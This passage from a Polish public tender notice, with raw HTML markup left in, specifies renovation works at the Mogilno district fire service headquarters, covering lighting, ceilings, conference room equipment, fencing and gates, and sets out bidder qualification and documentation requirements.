zamawiającym. Lamperia mozaikowa na korytarzu podziału bojowego należy połączyć z lamperią mozaikową klatki schodowej komendy. Montaż 6 listew ściennych narożnikowych metalowych (narożnik Stal Nierdzewna 40x40mm; 1,45m). Usunięcie drzwi i futryny pomieszczenia suszarni. Dostawa i montaż nowych drzwi drewnianych, na wzór stylu i kolorystki drzwi istniejących w większości pomieszczeń komendy wraz z ościeżnicami i opaskami. Drzwi wyposażone w klamkę oraz zamek na klucz patentowy. Zakup i montaż 3 głośników sufitowych białych okrągłych szt. 2 min 15W oraz podłączenie do istniejącej instalacji radiowęzła – długość przewodu zasilającego 20 m. Po zakończeniu prac wykonawca zamontuje wcześniej zdemontowany osprzęt na ścianach.4)	KLATKA SCHODOWADemontaż 1 lampy oświetleniowej oraz urządzeń alarmowych (głośniki, oświetlenie alarmowe), montaż sufitu podwieszanego kasetonowego na konstrukcji stelażowej wykonanej z profili metalowych, kolor kasetonów biały – 11 m2. Montaż nowego oświetlenia typu led w kasetonach. 2 lampy typu plafon o wymiarach 59,5cm x 59,5cm Szerokość ramki: 2,5cm Grubość/wysokość: 1cm Ilość lumenów: 3200Lm Moc: 40W. Kolor elementu z diodami: śnieżnobiały Kolor ramki: srebrny, aluminium. Temperatura światła: biały neutralny 4500K. Kąt świecenia: ok. 120° Ochrona IP: IP20 Temperatura pracy: -15 do +50st C Brak emisji promieniowania UV oraz podczerwieni. Wymiana jednej oprawy oświetleniowej alarmowej 24 V. Oprawa z tworzywa sztucznego okrągła lub kwadratowa koloru białego, Barwa światła 4000K Strumień świetlny 960lm, wskaźnik oddawania barw >80, zasilanie 24V DC, moc 12W, klasa energetyczna A, klasa ochronności I, stopień szczelności (IP) IP44, liczba cykli on/off 30000, trwałość 30000h, współczynnik mocy >0.9, wymiary fi 260 mm. Wymiana i montaż instalacji elektrycznej zasilającej w/w lampy, włączniki schodowe 2 szt., instalacja oświetleniowa wykonana z przewodu miedzianego płaskiego 3x1,5 750V YDYp – 25 m. Zasilanie instalacji elektrycznej należy poprowadzić od skrzynki bezpiecznikowej usytuowanej na remontowanej klatce schodowej. Wykonawca dokona obniżenia urządzeń zamocowanych na ścianach i suficie oraz przedłużenie instalacji elektrycznych ich zasilającej, które poprzez obniżenie sufitu będą kolidować z konstrukcją sufitu. Ściany, zeskrobanie i zmycie starej farby ze ścian, przygotowanie powierzchni starych tynków do malowania farbami emulsyjnymi łącznie z szpachlowaniem nierówności powierzchni tynku. Położenie gładzi gipsowej na ścianach z elementów prefabrykowanych i betonów. Przygotowanie do malowania, malowanie ścian (co najmniej dwa razy do uzyskania jednolitego koloru). Kolor farby na ściany do uzgodnienia z zamawiającym. Farba odporna na ścieranie i poplamienie. Powierzchnia ścian do malowania 20m2. Lamperia - oczyszczenie, uzupełnienie ubytków przygotowanie powierzchni do nałożenia oraz nałożenie cienkowarstwowego tynku mozaikowego od poziomu cokolika na wysokość 145cm powierzchnia 23m2. Kolor, struktura, gęstość mozaiki na lamperie do uzgodnienia z zamawiającym. Lamperia mozaikowa na korytarzu podziału bojowego należy połączyć z lamperią mozaikową klatki schodowej. Wykonanie zabudowy pod schodami w celu utworzenia nowego zamykanego drzwiami pomieszczenia magazynowego. Ściany wykonane z płyt kartonowo-gipsowych o wymiarach wys. 2,45 m, dł. 1,8 m, szer. 1,4. Montaż oświetlenia oraz włącznika. Ułożenie dwóch kabli skrętki ośmiożyłowej od pomieszczenia serwerowni do pomieszczenia d-cy zmian – dł. ok. 50m. Po zakończeniu prac wykonawca zamontuje wcześniej zdemontowany osprzęt na ścianach.5)	SALA KONFERENCYJNASkuwanie glazury z posadzki 93 m2, ułożenie terakoty na posadzce – 93 m2. Wzór, wielkość, kolor do uzgodnienia z zamawiającym. Demontaż 20 lamp oświetleniowych, montaż sufitu podwieszanego kasetonowego na konstrukcji stelażowej wykonanej z profili metalowych, kolor kasetonów biały – 93 m2. Montaż nowego oświetlenia typu led w kasetonach. 20 lamp typu plafon o wymiarach 59,5cm x 59,5cm Szerokość ramki: 2,5cm Grubość/wysokość: 1cm Ilość lumenów: 3200Lm Moc: 40W. Kolor elementu z diodami: śnieżnobiały Kolor ramki: srebrny, aluminium. Temperatura światła: biały neutralny 4500K. Kąt świecenia: ok. 120° Ochrona IP: IP20 Temperatura pracy: -15 do +50st C Brak emisji promieniowania UV oraz podczerwieni. Montaż 2 głośników sufitowych wraz z podłączeniem do instalacji radiowęzła. Montaż nagłośnienia radiowęzłowego składającego się ze wzmacniacza o mocy min. 150W z Bluetooth, odtwarzającego Mp3/USB/SD, radiem FM oraz pilotem do jego obsługi, z możliwością podłączenia do komputera poprzez gniazdo wysuwane, umiejscowione w podłodze, (miejsce zamocowania gniazda wskaże zamawiający, dł. kabla 5m), głośniki sufitowe białe okrągłe szt. 10 min 15W. Montaż wzmacniacza na półce podsufitowej. Wymiana i montaż instalacji elektrycznej zasilającej w/w lampy, włączniki oraz gniazd elektrycznych w ilości 25 szt. Instalacja oświetleniowa wykonana z przewodu miedzianego płaskiego 3x1,5 750V YDYp – 80m, instalacja zasilająca gniazda elektryczne wykonana z przewodu miedzianego płaskiego 3x2,5 750V YDYp – 70m. Zasilanie instalacji elektrycznej należy poprowadzić od skrzynki bezpiecznikowej usytuowanej na remontowanym korytarzu 2 piętra. Wykonawca dokona obniżenia urządzeń zamocowanych na ścianach i suficie oraz przedłużenie instalacji elektrycznych ich zasilającej, które poprzez obniżenie sufitu będą kolidować z konstrukcją sufitu. Ściany, przygotowanie powierzchni starych tynków do malowania farbami emulsyjnymi łącznie z szpachlowaniem nierówności gipsem, usunięciem pęknięć oraz luźnych części powierzchni tynku. Przygotowanie do malowania, malowanie ścian (co najmniej dwa razy do uzyskania jednolitego koloru). Kolor farby na ściany do uzgodnienia z zamawiającym. Farba odporna na ścieranie i poplamienie. Powierzchnia ścian do malowania 57 m2. Szpachlowanie, malowanie wnęki okiennej oraz montaż dwóch parapetów z konglomeratu o wymiarach 305 x 37 cm x 2 cm. Lamperia - oczyszczenie, uzupełnienie ubytków przygotowanie powierzchni do nałożenia oraz nałożenie cienkowarstwowego tynku mozaikowego od poziomu płytki na wysokość 155cm powierzchnia 51m2. Kolor, struktura, gęstość mozaiki na lamperie do uzgodnienia z zamawiającym. Demontaż przegrodzenia istniejącego wraz z demontażem ścianki działowej. Wykonanie zabudowy filaru płytą kartonowo-gipsową, pokrycie mozaiką na wysokość 155 cm, pozostała część pomalowana farbą ścienną. Po zakończeniu prac wykonawca zamontuje wcześniej zdemontowany osprzęt na ścianach.Montaż w podwieszanym suficie projektora multimedialnego wraz z niezbędną instalacją do połączenia z laptopem znajdującym się na wyposażeniu KP PSP w Mogilnie we wskazanym miejscu poprzez gniazdo wykorzystywane do połączenia z nagłośnieniem świetlicy. Montaż ekranu projekcyjnego elektrycznego o wymiarach 150" 332x187cm, 16:9 z pilotem z możliwością zamocowania na suficie bądź na ścianie (miejsce zamontowania wskaże zamawiający). Wykonawca wykona podłączenia tegoż ekranu do instalacji 230V.Montaż telewizora 40 cali będącego na stanie KP PSP w Mogilnie na ścianie we wskazanym miejscu wraz z podłączeniem go do instalacji 230V oraz antenowej.Zakup 50 szt. krzeseł konferencyjnych - tapicerka odporna na ścieranie w kolorze czarnym, stalowa rama w kolorze czarnym, spełniające atesty i normy (PN-EN 16139, PN-EN 1728, PN-EN 1022). Wymiary zamawianego produktu: Wysokość 82 cm, Szerokość 54 cm, Głębokość 59 cm, Wysokość do siedziska 45 cm, Głębokość siedziska 42 cm, Wysokość oparcia 36 cm, Waga produktu 5kg, Maksymalne obciążenie 160 kg. Zakup 9szt. stołów z oskrzynią, blatem o wymiarach 190x90 o grubości 36mm lub 38mm, w kolorze uzgodnionym ze zleceniodawcą. Wysokość całkowita stołów 75,5cm.6)	POMIESZCZENIA GARAŻOWEMontaż nad bramą wyjazdową wyświetlacza numeryczno-dźwiękowego alarmowego połączonego instalacją 3x1,5 750V YDYp-25m z wyświetlaczem na klatce schodowej 1 piętra. Urządzenie musi być kompatybilne z istniejącą instalacją alarmową.7)	REMONT OGRODZENIAa)	Wymiana ogrodzenia lewa strona.Rozebranie ogrodzenia drewnianego oraz betonowego z przęseł przenośnych – dł. 39m. Rozebranie istniejącego fundamentu z bloczków betonowych oraz wymurowanie w jego miejsce nowego fundamentu o dł. 24m na wysokość 5 bloczków. Montaż ogrodzenia z siatki panelowej 58,5 m2 na słupkach stalowych obsadzonych na gotowych cokołach. Panele oraz słupki ocynkowane malowane proszkowo na kolor zielony.b)	Remont ogrodzenia frontPrzygotowanie podłoża pod docieplenie metodą lekką-mokrą, poprzez oczyszczenie mechaniczne i zmycie 52,8 m2, Następnie dwukrotne gruntowanie emulsją 52,8 m2. Nałożenie na podłoże podkładowej masy tynkarskiej, pod wyprawy elewacyjne z tynku mineralnego – 31,8 m2. Położenie tynku elewacyjnego cienkowarstwowego mozaikowego lub piaskowego na cokole fundamentowym. Założenie nakrywy z elementów kamiennych lub betonowych o grubości 2 cm – 12 cm i szerokości do 50 cm – koloru czerwonego na całej długości murka – 27 m.Malowanie 17 słupków ogrodzenia farbą olejną, kolor do uzgodnienia z zamawiającym.8)	BRAMY WJAZDOWE NA TEREN KP PSP W MOGILNIEDemontaż dwóch bram wjazdowych na teren komendy, wykonanie oraz montaż dwóch nowych bram wjazdowych. Szczegół dotyczące projektu bramy w załączonej dokumentacji projektowej. 5.	Szczegółowy opis bramy znajduje się w dokumentacji projektowej stanowiącej załącznik nr 8 do SIWZ.6.	Przedmiar stanowiący załącznik nr 7 do SIWZ jest tylko dokumentem pomocniczym i nie może być jedyną podstawą dokonania wyceny. Podstawę do wykonania prac objętych zadaniem stanowi cała dokumentacja projektowa. Elementy robót nie ujęte w przedmiarach robót lub nie wycenione, a wynikające wprost z dokumentacji projektowej Zamawiający uzna za wycenione i ujęte w ofercie, bez jakichkolwiek roszczeń wykonawcy z tego tytułu.7.	Jeżeli dokumentacja projektowa wskazywałyby w odniesieniu do niektórych materiałów i urządzeń znaki towarowe lub pochodzenie, Zamawiający, zgodnie z art. 29 ust. 3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2019 r., poz. 1843), dopuszcza składanie materiałów równoważnych. Wszelkie materiały pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiającego i stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Poprzez zapis dotyczący minimalnych wymagań parametrów jakościowych, Zamawiający rozumie wymagania towarów zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy. Zamawiający przy opisie przedmiotu zamówienia, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach użytkowych, co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych parametrach lub lepszych. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały lub urządzenia. Będą one podlegały ocenie przez Zamawiającego, która będzie podstawą do podjęcia przez Zamawiającego decyzji o akceptacji materiałów równoważnych. 8.	Wykonawca zobowiązany jest wykonać przedmiot zamówienia zgodnie ze sztuką budowlaną i obowiązującymi przepisami prawa, a w szczególności ustawą z dnia07 lipca 1994 roku Prawo budowlane (Dz. U. z 2019 r., poz.1186). Prace muszą być wykonane zgodnie z warunkami technicznymi i wymogami oraz normami przy tego typu robotach. Wszystkie materiały wykorzystane do wykonania przedmiotu zamówienia muszą być dopuszczone do stosowania zgodnie z obowiązującymi przepisami.9.	Zamawiający zaleca przeprowadzenie przez wykonawcę wizji lokalnej w uzgodnionym z zamawiającym terminie do dnia składania ofert. 10.	Zamawiający dopuszcza możliwość prowadzenia prac remontowych w dni robocze, w okresie pn. – pt., w godzinach 700-1700. Zamawiający nie wyklucza możliwości prowadzenia prac w innych godzinach, o ile będzie dysponował osobami, które mogą w tym czasie pozostać w pomieszczeniach razem z pracownikami wykonawcy11.	Wykonawca jest zobowiązany do: utrzymywania porządku na placu budowy, zabezpieczenia zgromadzonych materiałów, zapewnienia właściwego oznakowania placu budowy, zabezpieczenia istniejącej zieleni oraz umożliwienia bezkolizyjnego funkcjonowania obiektów zlokalizowanych w sąsiedztwie placów budowy. 12.	Materiały użyte do wykonania robót zapewnia Wykonawca. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45211350-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-12-24</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-12-24</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia szczegółowego warunku dotyczącego posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">a)	Wykonawca musi udowodnić, iż wykonał (zrealizował i zakończył) nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej jedną robotę budowlaną o wartości co najmniej 100 000,00 zł (słownie: sto tysięcy złotych 00/100), polegającą na remoncie, budowie, rozbudowie lub przebudowie budynku użyteczności publicznej, z podaniem rodzaju i wartości tego zamówienia oraz daty i miejsca wykonania. Wykonawca zobowiązany jest do przedłożenia dokumentów potwierdzających, że roboty te zostały wykonane należycie oraz terminowo, zgodnie z określającymi je warunkami technicznymi i prawidłowo ukończone. Uszczegółowienie: Przez zamówienia wykonane należy rozumieć:-	zamówienia rozpoczęte i zakończone w w/w okresie,-	zamówienia zakończone w w/w okresie, których rozpoczęcie mogło nastąpić wcześniej niż w w/w okresie.b) Wykonawca musi dysponować osobami: −	Kierownik budowy posiadający uprawnienia budowlane branży konstrukcyjno-budowlanej. Kierownik ten powinien być członkiem właściwej izby samorządu zawodowego.Zamawiający wymaga od Wykonawców wskazania imienia i nazwiska osoby wykonującej czynności przy realizacji zamówienia wraz z informacją o wykształceniu, zakresie wykonywanych czynności, kwalifikacjach zawodowych, doświadczeniu tej osoby oraz o podstawie dysponowania tą osobą – załącznik nr 9 do SIWZ. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1)	informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,3)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,4)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty – według wzoru stanowiącego załącznik nr 5 do SIWZ.b)	wykaz osób odpowiedzialnych za kierowanie robotami budowlanymi, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – według wzoru stanowiącego załącznik nr 9 do SIWZ</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Nie</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span 